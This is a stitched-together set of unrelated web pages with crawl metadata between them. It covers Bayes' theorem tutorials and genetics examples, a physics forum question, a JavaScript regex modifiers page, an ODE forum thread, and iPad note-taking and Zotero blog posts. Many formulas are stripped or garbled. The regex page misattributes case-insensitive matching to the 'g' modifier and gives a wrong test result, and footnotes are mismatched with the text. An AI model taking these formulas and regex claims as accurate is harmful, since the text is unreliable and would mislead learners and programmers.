terms. It is then useful to eliminate the denominator using the law of total probability. For fY(y), this becomes an integral: ### Bayes' rule Edit is called the Bayes factor or likelihood ratio. The odds between two events is simply the ratio of the probabilities of the two events. Thus Thus, the rule says that the posterior odds are the prior odds times the Bayes factor, or in other words, the posterior is proportional to the prior times the likelihood. ### Propositional logic Edit Bayes' theorem represents a generalisation of contraposition which in propositional logic can be expressed as: The corresponding formula in terms of probability calculus is Bayes' theorem which in its expanded form is expressed as: ### Subjective logic Edit Bayes' theorem represents a special case of conditional inversion in subjective logic expressed as: ¬ B S ) = ( ω B ∣ A S , ω B ∣ ¬ A S ) ϕ Hence, the subjective Bayes' theorem represents a generalization of Bayes' theorem. [9] ### Conditioned version Edit A conditioned version of the Bayes' theorem [10] results from the addition of a third event C on which all probabilities are conditioned: #### Derivation Edit P ( A ∩ B ∩ C ) = P ( A ∣ B ∩ C ) P ( B ∣ C ) P ( C ) P ( A ∩ B ∩ C ) = P ( B ∩ A ∩ C ) = P ( B ∣ A ∩ C ) P ( A ∣ C ) P ( C ) The desired result is obtained by identifying both expressions and solving for P ( A ∣ B ∩ C ) . ### Bayes' rule with 3 events Edit In the case of 3 events - A, B, and C - it can be shown that: Bayes' theorem is named after the Reverend Thomas Bayes ( / b eɪ z / c. 1701 – 1761), who first used conditional probability to provide an algorithm (his Proposition 9) that uses evidence to calculate limits on an unknown parameter, published as An Essay towards solving a Problem in the Doctrine of Chances (1763). He studied how to compute a distribution for the probability parameter of a binomial distribution (in modern terminology). On Bayes' death his family transferred his papers to his old friend, Richard Price (1723 – 1791) who over a period of two years significantly edited the unpublished manuscript, before sending it to a friend who read it aloud at the Royal Society on 23 December 1763. [1] [ page needed ] Price edited [12] Bayes's major work "An Essay towards solving a Problem in the Doctrine of Chances" (1763), which appeared in Philosophical Transactions, [13] and contains Bayes' theorem. Price wrote an introduction to the paper which provides some of the philosophical basis of Bayesian statistics and chose one of the two solutions offered by Bayes. In 1765, Price was elected a Fellow of the Royal Society in recognition of his work on the legacy of Bayes. [14] [15] On 27 April a letter sent to his friend Benjamin Franklin was read out at the Royal Society, and later published, where Price applies this work to population and computing 'life-annuities'. [16] Independently of Bayes, Pierre-Simon Laplace in 1774, and later in his 1812 Théorie analytique des probabilités, used conditional probability to formulate the relation of an updated posterior probability from a prior probability, given evidence. He reproduced and extended Bayes's results in 1774, apparently unaware of Bayes's work. [note 1] [17] The Bayesian interpretation of probability was developed mainly by Laplace. [18] Sir Harold Jeffreys put Bayes's algorithm and Laplace’s formulation on an axiomatic basis, writing that Bayes' theorem "is to the theory of probability what the Pythagorean theorem is to geometry". [19] Stephen Stigler used a Bayesian argument to conclude that Bayes' theorem was discovered by Nicholas Saunderson, a blind English mathematician, some time before Bayes [20] [21] that interpretation, however, has been disputed. [22] Martyn Hooper [23] and Sharon McGrayne [24] have argued that Richard Price's contribution was substantial: By modern standards, we should refer to the Bayes–Price rule. Price discovered Bayes's work, recognized its importance, corrected it, contributed to the article, and found a use for it. The modern convention of employing Bayes's name alone is unfair but so entrenched that anything else makes little sense. [24] In genetics, Bayes' theorem can be used to calculate the probability of an individual having a specific genotype. Many people seek to approximate their chances of being affected by a genetic disease or their likelihood of being a carrier for a recessive gene of interest. A Bayesian analysis can be done based on family history or genetic testing, in order to predict whether an individual will develop a disease or pass one on to their children. Genetic testing and prediction is a common practice among couples who plan to have children but are concerned that they may both be carriers for a disease, especially within communities with low genetic variance. [ citation needed ] The first step in Bayesian analysis for genetics is to propose mutually exclusive hypotheses: for a specific allele, an individual either is or is not a carrier. Next, four probabilities are calculated: Prior Probability (the likelihood of each hypothesis considering information such as family history or predictions based on Mendelian Inheritance), Conditional Probability (of a certain outcome), Joint Probability (product of the first two), and Posterior Probability (a weighted product calculated by dividing the Joint Probability for each hypothesis by the sum of both joint probabilities). This type of analysis can be done based purely on family history of a condition or in concert with genetic testing. [ citation needed ] ### Using pedigree to calculate probabilities Edit Hypothesis Hypothesis 1: Patient is a carrier Hypothesis 2: Patient is not a carrier Prior Probability 1/2 1/2 Conditional Probability that all four offspring will be unaffected (1/2) · (1/2) · (1/2) · (1/2) = 1/16 About 1 Joint Probability (1/2) · (1/16) = 1/32 (1/2) · 1 = 1/2 Posterior Probability (1/32) / (1/32 + 1/2) = 1/17 (1/2) / (1/32 + 1/2) = 16/17 Example of a Bayesian analysis table for a female individual's risk for a disease based on the knowledge that the disease is present in her siblings but not in her parents or any of her four children. Based solely on the status of the subject’s siblings and parents, she is equally likely to be a carrier as to be a non-carrier (this likelihood is denoted by the Prior Hypothesis). However, the probability that the subject’s four sons would all be unaffected is 1/16 (½·½·½·½) if she is a carrier, about 1 if she is a non-carrier (this is the Conditional Probability). The Joint Probability reconciles these two predictions by multiplying them together. The last line (the Posterior Probability) is calculated by dividing the Joint Probability for each hypothesis by the sum of both joint probabilities. [25] ### Using genetic test results Edit Parental genetic testing can detect around 90% of known disease alleles in parents that can lead to carrier or affected status in their child. Cystic fibrosis is a heritable disease caused by an autosomal recessive mutation on the CFTR gene, [26] located on the q arm of chromosome 7. [27] Bayesian analysis of a female patient with a family history of cystic fibrosis (CF), who has tested negative for CF, demonstrating how this method was used to determine her risk of having a child born with CF: Because the patient is unaffected, she is either homozygous for the wild-type allele, or heterozygous. To establish prior probabilities, a Punnett square is used, based on the knowledge that neither parent was affected by the disease but both could have been carriers: Homozygous for the wild- type allele (a non-carrier) Heterozygous (a CF carrier) Homozygous for the wild- type allele (a non-carrier) Heterozygous (a CF carrier) (affected by cystic fibrosis) Given that the patient is unaffected, there are only three possibilities. Within these three, there are two scenarios in which the patient carries the mutant allele. Thus the prior probabilities are ⅔ and ⅓. Next, the patient undergoes genetic testing and tests negative for cystic fibrosis. This test has a 90% detection rate, so the conditional probabilities of a negative test are 1/10 and 1. Finally, the joint and posterior probabilities are calculated as before. Hypothesis Hypothesis 1: Patient is a carrier Hypothesis 2: Patient is not a carrier Prior Probability 2/3 1/3 Conditional Probability of a negative test 1/10 1 Joint Probability 1/15 1/3 Posterior Probability 1/6 5/6 After carrying out the same analysis on the patient’s male partner (with a negative test result), the chances of their child being affected is equal to the product of the parents' respective posterior probabilities for being carriers times the chances that two carriers will produce an affected offspring (¼). ### Genetic testing done in parallel with other risk factor identification. Edit Bayesian analysis can be done using phenotypic information associated with a genetic condition, and when combined with genetic testing this analysis becomes much more complicated. Cystic Fibrosis, for example, can be identified in a fetus through an ultrasound looking for an echogenic bowel, meaning one that appears brighter than normal on a scan2. This is not a foolproof test, as an echogenic bowel can be present in a perfectly healthy fetus. Parental genetic testing is very influential in this case, where a phenotypic facet can be overly influential in probability calculation. In the case of a fetus with an echogenic bowel, with a mother who has been tested and is known to be a CF carrier, the posterior probability that the fetus actually has the disease is very high (0.64). However, once the father has tested negative for CF, the posterior probability drops significantly (to 0.16). [25] Risk factor calculation is a powerful tool in genetic counseling and reproductive planning, but it cannot be treated as the only important factor to consider. As above, incomplete testing can yield falsely high probability of carrier status, and testing can be financially inaccessible or unfeasible when a parent is not present. ## 11.2 Bayes’ theorem and inverse inference The reason that Bayesian statistics has its name is because it takes advantage of Bayes’ theorem to make inferences from data about the underlying process that generated the data. Let’s say that we want to know whether a coin is fair. To test this, we flip the coin 10 times and come up with 7 heads. Before this test we were pretty sure that the (P_=0.5) , but finding 7 heads out of 10 flips would certainly give us pause if we believed that (P_=0.5) . We already know how to compute the conditional probability that we would flip 7 or more heads out of 10 if the coin is really fair ( (P(nge7|p_=0.5)) ), using the binomial distribution. The resulting probability is 0.055. That is a fairly small number, but this number doesn’t really answer the question that we are asking – it is telling us about the likelihood of 7 or more heads given some particular probability of heads, whereas what we really want to know is the true probability of heads for this particular coin. This should sound familiar, as it’s exactly the situation that we were in with null hypothesis testing, which told us about the likelihood of data rather than the likelihood of hypotheses. Remember that Bayes’ theorem provides us with the tool that we need to invert a conditional probability: We can think of this theorem as having four parts: • prior ( (P(Hypothesis)) ): Our degree of belief about hypothesis H before seeing the data D • likelihood ( (P(Data|Hypothesis)) ): How likely are the observed data D under hypothesis H? • marginal likelihood ( (P(Data)) ): How likely are the observed data, combining over all possible hypotheses? • posterior ( (P(Hypothesis|Data)) ): Our updated belief about hypothesis H, given the data D In the case of our coin-flipping example: • prior ( (P_) ): Our degree of belief about the likelhood of flipping heads, which was (P_=0.5) • likelihood ( (P( ext<7 or more heads out of 10 flips>|P_=0.5)) ): How likely are 7 or more heads out of 10 flips if (P_=0.5)) ? • marginal likelihood ( (P( ext<7 or more heads out of 10 flips>)) ): How likely are we to observe 7 heads out of 10 coin flips, in general? • posterior ( (P_| ext<7 or more heads out of 10 coin flips>)) ): Our updated belief about (P_) given the observed coin flips Here we see one of the primary differences between frequentist and Bayesian statistics. Frequentists do not believe in the idea of a probability of a hypothesis (i.e. our degree of belief about a hypothesis) – for them, a hypothesis is either true or it isn’t. Another way to say this is that for the frequentist, the hypothesis is fixed and the data are random, which is why frequentist inference focuses on describing the probability of data given a hypothesis (i.e. the p-value). Bayesians, on the other hand, are comfortable making probability statements about both data and hypotheses. ## Addition Law, Multiplication Law and Bayes Theorem In this lesson we will look at some laws or formulas of probability: the Addition Law, the Multiplication Law and the Bayes&rsquo Theorem or Bayes&rsquo Rule. The following diagram shows the Addition Rules for Probability: Mutually Exclusive Events and Non-Mutually Exclusive Events. Scroll down the page for more examples and solutions on using the Addition Rules. ### Addition Law of Probability The general law of addition is used to find the probability of the union of two events. The expression denotes the probability of X occurring or Y occurring or both X and Y occurring. The Addition Law of Probability is given by If the two events are mutually exclusive, the probability of the union of the two events is the probability of the first event plus the probability of the second event. Since mutually exclusive events do not intersect, nothing has to be subtracted. If X and Y are mutually exclusive, then the addition law of probability is given by ### Multiplication Law of Probability The following diagram shows the Multiplication Rules for Probability (Independent and Dependent Events) and Bayes' Theorem. Scroll down the page for more examples and solutions on using the Multiplication Rules and Bayes' Theorem. The probability of the intersection of two events is called joint probability. The Multiplication Law of Probability is given by The notation is the intersection of two events and it means that both X and Y must happen. denotes the probability of X occurring given that Y has occurred. When two events X and Y are independent, If X and Y are independent then the multiplication law of probability is given by ### Bayes&rsquo Theorem or Bayes&rsquo Rule The Bayes&rsquo Theorem was developed and named for Thomas Bayes (1702 &ndash 1761). Bayes&rsquo rule enables the statistician to make new and different applications using conditional probabilities. In particular, statisticians use Bayes&rsquo rule to &lsquorevise&rsquo probabilities in light of new information. The Bayes&rsquo theorem is given by Bayes&rsquo theorem can be derived from the multiplication law Bayes&rsquo Theorem can also be written in different forms Try the free Mathway calculator and problem solver below to practice various math topics. Try the given examples, or type in your own problem and check your answer with the step-by-step explanations. ## When does Bayes’ Theorem help? Let’s consider this problem. A, B, C are the rating that a bank gives to its borrowers. Let’s the probability of getting rated A, B, and C are as follows. Some of the customers defaulted on their borrowings. 1% of the customers who were rated A, 10% of the customers who were rated B and 18% of the customers who were rated C became defaulters. If a customer who is a defaulter. What is the probability that he was rated A? We can show all the customers of the bank by a rectangle and designate the portion of the customer’s who are rated A, B and C respectively by sections which are named A, B, and C as below. Also, the circle represents the customers who are defaulters and is denoted by D. ## 12.4: Bayes Theorem In example 17 we considered a diagnostic test, and the probability of the test detecting the disease in someone who has it. But diagnostic tests can sometimes produce ‘false positives’: a test may claim the presence of the disease in someone who does not have it. In these situations, we will want to know how likely it is someone has the disease, conditional on their test result. A new diagnostic test has been developed for a particular disease. It is known that 0.1% of people in the population have the disease. The test will detect the disease in 95% of all people who really do have the disease. However, there is also the possibility of a “false positive” out of all people who do not have the disease, the test will claim they do in 2% of cases. A person is chosen at random to take the test, and the result is “positive”. How likely is it that that person has the disease? Theoremل. (Bayes’ theorem) Suppose we have a partition of $mathcal= < E_1,ldots ,E_n>$ of a sample space $S$. Then for any event $F$, Note that we can calculate $P(F)$ via the law of total probability: Using this we can write Bayes’ theorem as This is often the most useful version in practice. Note that if $E$ is a single event then $< E,ar>$ is a partition with $n=2$, so we get a special case of Bayes’ theorem, In the context of Bayes’ theorem, we sometimes refer to $P(E_i)$ as the prior probability of $E_i$, and $P(E_i|F)$ as the posterior probability of $E_i$ given $F$. The prior probability states how likely we thought $E_i$ was before we knew that $F$ had occurred, and the posterior probability states how likely we think $E_i$ is after we have learnt that $F$ has occurred. Now,lets get back to our problem and try to solve it using Bayes’s Theorem A = Probability of Bag 1 B = Probability of Black ball P(A) = 1/2 = 0.5(Since there are two bags,probability of choosing Bag 1 is 1/2) P(B|A) = 0.48 (Probability of black ball given bag1 #We have already solved this above) P(B) = (24+40)/110 = 0.58 (Number of black balls in both the bags/Total number of balls in both the bags) Thus,P(A|B) = 0.5 * 0.48 / 0.58 = 0.41 This example shows one application of Bayes Theorem.This theorem helps you to get one conditional probability from other. ## Chapter 13 Class 12 Probability Get NCERT solutions of all examples, exercises and Miscellaneous questions of Chapter 13 Class 12 Probability with detailed explanation. Formula sheet also available. We started learning about Probability from Class 6, we learned that Probability is Number of outcomes by Total Number of Outcomes. In Class 11, we learned about Sample Space, Events, using Sets. In this chapter, we will learn about • Conditional Probability - Finding probability of something when an event has already occurred. For example - finding probability of 4 coming in second throw of die if 6 has come in first throw. We also discuss its formula, properties and questions • Independent events - What is an independent event, and where is it used? • Multiplication rule of probability - We learn about dependent and independent events, and the multiplication rule for 2, or more than two events • Basic Probability - We solve questions using basic formula - Number of outcomes/Total Outcomes to find Probability, set theory, and permutation and combinations to find probability. • Theorem of total probability - We use the formula P(A) = P(B) P(A|B) + P(B') P(A|B') • Bayes theorem - Finding probability when an event has already happened • Random Variable - Writing random variable • Probability distribution - Finding probability distribution of random variable, and finding its mean (or expectation) • Variance and Standard Deviation of a Random Variable - Finding variance and standard deviation using probability distribution • Bernoulli Trials - Checking if an event is a Bernoulli trial • Binomial Distribution - For Bernoulli Trial, finding probability using Binomial Distribution Check the chapter from different Concepts, starting from Basic to Advanced, or you can also refer to the exercises mentioned in the NCERT Book. Click on a topic below to start
2021-11-30 21:11:31
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7463036775588989, "perplexity": 826.4466090071196}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964359073.63/warc/CC-MAIN-20211130201935-20211130231935-00452.warc.gz"}
https://www.physicsforums.com/threads/maximum-height-of-a-uniform-vertical-column.52316/
Maximum height of a uniform vertical column 1. Nov 11, 2004 physicsss There is a maximum height of a uniform vertical column made of any material that can support itself without breaking, and it is independent of the cross-sectional area. (a) Calculate this height for steel (density 7.8 103 kg/m3). (b) Calculate this height for granite (density 2.7 103 kg/m3). 2. Nov 11, 2004 Yegor You have to know limit of durability of material M*g=σ*s M=ρ*l*S g*l*ρ=σ l=σ/(g*ρ), where ρ=density, σ=limit of durability (maximal stress), S=Area 3. Nov 11, 2004 physicsss How do I find the limit durability of material?
2017-08-16 15:55:29
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8259545564651489, "perplexity": 5510.033137352831}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886102307.32/warc/CC-MAIN-20170816144701-20170816164701-00519.warc.gz"}
https://codejagd.com/list-of-javascript-regex-modifiers
## List of JavaScript regex modifiers Last Updated On Thursday 20th Jan 2022 ## regex javascript ### g modifier • non-case sensitive matching. Upper and lower cases don’t matter. • global match. We attempt to find all matches instead of just returning the first match. • The internal state of the regular expression stores where is located the last match, and matching is resumed where it was left in the previous match. ### m modifier • multiline match. It treats the ^ and \$ characters to match the beginning and the end of each line of the tested string. • A newline character is determined by n or r. ### u modifier • Unicode search. The regex pattern is treated as a Unicode sequence ### y modifier • In Simple Sticky search > const str = 'Intresting Movie'; > /re/.test(str); false > /re/i.test(str); true
2022-10-06 06:39:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.17176903784275055, "perplexity": 6640.10643958016}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00296.warc.gz"}
https://forum.math.toronto.edu/index.php?PHPSESSID=3pcdglgl7oo6iupmthl0m863r7&action=printpage;topic=1385.0
# Toronto Math Forum ## MAT244--2018F => MAT244--Tests => Term Test 1 => Topic started by: Victor Ivrii on October 16, 2018, 05:33:08 AM Title: TT1 Problem 4 (noon) Post by: Victor Ivrii on October 16, 2018, 05:33:08 AM Find the general solution for equation \begin{equation*} y''(t)+6y'(t)+10y(t)=5e^{-3t} +13\cos(t) . \end{equation*} Title: Re: TT1 Problem 4 (noon) Post by: Jialu Lin on October 16, 2018, 06:51:31 AM Here is my solution. Title: Re: TT1 Problem 4 (noon) Post by: Shengying Yang on October 16, 2018, 07:37:25 AM For the homogeneous part, I think $r=-3\pm i​$ . Therefore, $$y_c(t)=C_1e^{-3t}cost+C_2e^{-3t}sint$$ I will post my answer below. Title: Re: TT1 Problem 4 (noon) Post by: Shengying Yang on October 16, 2018, 07:41:48 AM First, we consider $y''+6y'+10y=0​$ $$r^2+6r+10=0$$ $$∴r=-3\pm i​$$ $$∴y_c(t)=C_1e^{-3t}\cos t+C_2e^{-3t}\sin t$$ Second, we consider $y''+6y'+10y=5e^{-3t}​$, let $$y_{p1}(t)= Ae^{-3t}, y'_{p1}(t)=-3Ae^{-3t}, y''_{p1}(t)=9Ae^{-t}​$$ $$9Ae^{-3t} -18Ae^{-3t}+10Ae^{-3t} =5e^{-3t}$$ $$∴A=5$$ $$∴y_{p1}(t)= 5e^{-3t}$$ Third, we consider $y''+6y'+10y=13\cos t$ , let $$y_{p2}(t)= B\cos t+C\sin t, y'_{p2}(t)= -B\sin t+C\cos t,y''_{p2}(t)= -B\cos t-C\sin t​$$ $$∴-B\cos t-C\sin t+(-B\sin t+C\cos t)+10(B\cos t+C\sin t)=13\cos t$$ $$∴9C-6B=0, 9B+6C=13$$ $$∴ B=1, C=\frac{2}{3}$$ $$∴y_{p2}(t)= \cos t+\frac{2}{3}\sin t​$$ Therefore, $$y(t)=y_c(t)+y_{p1}(t)+y_{p2}(t) =C_1e^{-3t}\cos t+C_2e^{-3t}\sin t+5e^{-3t}+\cos t+\frac{2}{3}\sin t$$ Title: Re: TT1 Problem 4 (noon) Post by: Victor Ivrii on October 18, 2018, 03:46:10 AM Jialu found a correct particular solution for inhomogeneous equation, but made a mistake in the general solution for homogeneous equation. Shengying did everything right (and the LaTeX is good).
2022-09-27 17:08:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8879449367523193, "perplexity": 12053.485014077372}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335054.79/warc/CC-MAIN-20220927162620-20220927192620-00382.warc.gz"}
https://appademic.tech/tag/ipad/
## Automate Referencing on iPad with Shortcuts and Zotero Update (2019-01-26): If you’re a Better BibTeX user, there is a new shortcut available to extract your citation keys ### Citation Management on iOS For as long as the iPad has been an excellent device for focused writing, it has never been good for citations and referencing. Referencing on iPad remains the final, stubborn piece of the puzzle to fully untether iOS from the Mac for academic writing. It appears, without exception, the iOS is not yet viewed by developers of referencing software as a fully fledged computing platform. That leaves us with a choice between poorly designed companion apps, or hacking together a solution of our own. I have opted for the latter, by configuring different workflows using Apple’s Shortcuts app and the excellent Zotero API. What follows is not a primer on referencing, rather it is a means for managing citations on iPad, or even iPhone in a pinch. It assumes some knowledge of Zotero, but that is not difficult to acquire. These tips will be useful regardless of whether you work with both macOS and iOS, or do everything on an iPad. With a little help from iOS Shortcuts, referencing on iPad is that little bit less painful. ### Getting Material into Zotero on iOS Maybe one day we’ll get extensible browsers on iOS. Until then, we still have JavaScript bookmarklets. Most of your research is done online anyway, so using the Zotero Bookmarklet in a web browser works just fine. The only real caveat is you want to get your references from a source that Zotero will recognise. That will usually mean a university library, and my EZProxy shortcut can help with that. Another convenient option is to use the WorldCat Catalog. The WorldCat option has the added virtue of not needing a login, which makes it a hassle free way to get full bibliographic records. I have setup a shortcut that can be invoked from the widget to send a search query to WorldCat, and open the results in Safari. 1 Once you have the bibliographic record up, as long as you are logged in to Zotero, the Bookmarklet will scrape everything you need to populate your library with that record. Download the shortcut here: WorldCat Web Search Shortcut ### Cite as You Write on iOS There are different ways to come at this. The method you choose will depend on a few variables. The biggest distinction is likely to be whether you work iOS only, or you also operate a Mac. However, there is also a question of how complex your work is, and whether or not you want to automate the process entirely, or you’re happy to manage a few aspects manually. If you are looking for the more comprehensive option, see the section below on rendering a bibliography. If you write exclusively on iOS, and all you want to do is insert references from your Zotero library as you write, the following shortcut will do that. Invoke it from the widget to search your collection, and it will place a formatted in-text citation on the clipboard, eg. (Dickens, 1837, p. 21) 2 Zotero Cite as You Write Shortcut See below for how to automate the creation of your reference list. ### Cite as You Write on iOS for macOS Users If you are also using a Mac, you only need to know how you intend to process your finished works so you know which cite key style to use. If you intend to use Zotero’s own RTF scanner, your citations must be enclosed by {curly braces}. If you’re a Pandoc user, no doubt you already know you need [square brackets], among other things. 3 Zotero RTF Shortcut Zotero Pandoc Shortcut ### Automate Rendering a Reference List or Bibliography Depending on the complexity of your needs, this is where it can get tricky. If you’re writing anything genuinely long form — a dissertation, thesis, or a book — then this is the last remaining task where it is useful to have access to a Mac, or PC if necessary. That doesn’t mean you need to own one. Workarounds exist to make this possible from an iPad. #### The Simple Method For the most simple version of this, Zotero can produce a bibliography online, but it’s not pretty. Fortunately, Shortcuts can retrieve a formatted reference list from the Zotero API. If you want to use the Cite as You Write shortcut from above, you can retrieve the reference list, or bibliography from the relevant collection with the following shortcut. Zotero Bibliography Shortcut Note, these workflows don’t know what references are in your document, there is no way to automate that via Shortcuts. They are by no means perfect, so proof your work carefully. #### Run the Zotero RTF Scanner from an iPad (almost) Should you wish to automate the process completely, you will need access to a desktop to scan your work through the Zotero RTF scanner. The good news about keeping your references in Zotero, being a web service you can make use of on demand computing. You don’t need to maintain your Zotero library in a local database, it remains in the cloud. That means you only need temporary access to a desktop for the sole purpose of running your work through Zotero. 4 #### Amazon Workstations If you cannot access a desktop directly, there is always Amazon Workstations. It’s free to set one up, and you’ll only need it briefly. Be careful to choose an option available on the free tier though, or you could be in for an unpleasant surprise when a bill arrives. The iPad app for Amazon Workstations is useable enough for this. You can manage your referencing on iPad with Zotero, then setup a workstation to run the finished project through the scanner. #### Portable Apps Zotero Often on campus it is easy enough to access a desktop, but installing software can be a problem.  For that situation, the unofficial Portable Apps version of Zotero should do the trick.  Install it on a portable drive and run it on demand. To be honest, I like this option more than using AWS. ### Bonus Features #### Windows version This might not seem a big deal for iOS and Mac users, but Windows is everywhere. Apple users tend to forget this. Microsoft devices have improved dramatically recently, and there are plenty of other reasons for cross pollinating platforms. #### Private Wifi Syncing and WebDAV support I would like to see Notebooks add iCloud, and support for the iOS Files App, but the existing syncing options work well. Particularly pleasing is the consideration for privacy coded into the app via the Wifi option. If you have good reason for avoiding Dropbox, syncing can be managed across a local network. WebDAV support means Notebooks can also be synced via Synology and other private cloud solutions. ### The Question of Handwriting Devices like the iPad Pro are finally delivering on the long promise of matching the cognitive advantages of handwriting to digital convenience. At the same time, where handwriting recognition and inking engines have improved out of sight, the apps that deliver these tools can be limited. As such, I have come to think of handwriting apps as an interface for capturing notes. Notes ultimately end up elsewhere, in Notebooks, DEVONthink, or Keep-It. I have flipped between Notability, MyScript Nebo, and GoodNotes for handwriting. Nebo unquestionably has the best handwriting recognition, but the app hasn’t had much attention 7. Notability is a good self contained app if you can work with its limitations. However, I have returned to GoodNotes since it started generating searchable notes on the fly. Between the now instant OCR, and one of the best drag and drop implementations, GoodNotes is currently my favourite handwriting companion for Notebooks. Once a note is written, I open Notebooks and drag it from GoodNotes in slide over. The notes are preserved perfectly with the searchable layer. Handwriting is the most obvious missing feature of Notebooks at present, but it’s likely to be added in a future version. If and when that happens, this already excellent tool will become a bonafide killer app. Until then, I still recommend it as a better place to store handwritten notes, and GoodNotes has the most compatible feature set right now. #### Final Remarks I say final, there is another post following with Workflow and url scheme automation. Despite this relatively lengthy post, there remains a lot I haven’t covered. Nonetheless, I believe these highlights make Notebooks, in my opinion, the best general purpose note taking app on iPad for academic use. There is room for improvement, no doubt. I expect that handwriting will arrive at some point, and while the hooks are already deep in iOS further integration I have a final superficial qualifier. If I am going to spend any amount of time working in an app, I want it to look good. No problems here, the understated minimalism and use of whitespace make Notebooks a handsome app. 1. The scope of the article covers iOS. However, Notebooks is cross platform, with excellent versions on macOS and Windows. 2. Liquid Text has function for working with two documents, but it work vertically. Besides, Liquid Text is a world unto itself, so a subject for another time, 3. As opposed to dictating notes to text 4. If you know what MathJax is, chances are you have no problem with editing a few lines of HTML 5. I’ll be honest, I wish the app cost more since I have come to reply on it. Given what it can do, I feel it is seriously under priced. 6. It seems to get more buggy as iOS is incrementally updated. ## Creating Smart Reading Lists on iOS with Notebooks If Notebooks isn’t best note taking app for iPad, it is definitely the most underrated.  If you’re looking for a markdown notes app, a writing app, or a document storage container with a few unique tricks, you won’t find many better. Part notebook, part storage locker, and part GTD task management system. That might sound like a janky combination, but not only does it work well, it looks pretty too. It has been around for a while, so in lieu of a comprehensive review, I want to highlight a particular feature I haven’t seen anywhere else. The ability to turn notes into tasks. If you have a lot of reading to keep up with from a variety of sources, this is very handy. For planning and tracking big reading projects I still use TaskPaper on macOS, with its counterpart TaskMator on iOS. That system works well, with the outliner style lists making it easy to break up books, journals and so on with due dates. Using Notebooks has a distant advantage over that system, as it can collect the reading material itself. Web pages, notes, PDF documents, Word files, you can read them all directly in Notebooks. It will even let you index epub files to open in a third-party reader, like Marvin. Remember, at its core this is note taking app, while reading you can highlight text, make annotations, take clippings, and more. You can also take notes. This is a simple idea that in practice will help keep track of reading lists, note revisions, or really anything text based. It’s true you can fashion a similar system by chaining apps like DEVONthink and Things 3 together. To my mind this is more elegant, or at least less confusing. It works like this. As I collect reading material, I drop it into a Notebook that has been setup as a task list. When I’m on the clock I can setup due dates, reminders and so on. More importantly, I can tick items off as I go, meaning a quick visual guide is available to measure progress. It’s easy enough to use Notebooks’ share extension for this — or bookmarklets on the Mac — but there are two alternative methods I prefer. First, Notebooks has a very hand URL scheme which is clever about capturing all kinds of data, which makes setting up a custom action extension for Workflow trivial. ### Notebooks Drag and Drop The Workflow action above is especially handy on the iPhone, but the iPad has another option that is easier still. Notebooks has excellent support for the drag and drop feature of iOS 11. So if you don’t fancy using Workflow, you can use multitasking to simply drag links and files directly into a reading list. Or, you can use something like the excellent shelf app Gladys to hold the material you collect before dropping it into Notebooks later. Gladys now has a Mac version too, which adds some continuity to the workflow. ### Among the Best Note Taking Apps If you follow this site, you probably know by now that all my data ends up in DEVONthink, one way, or another. Whatever passes through 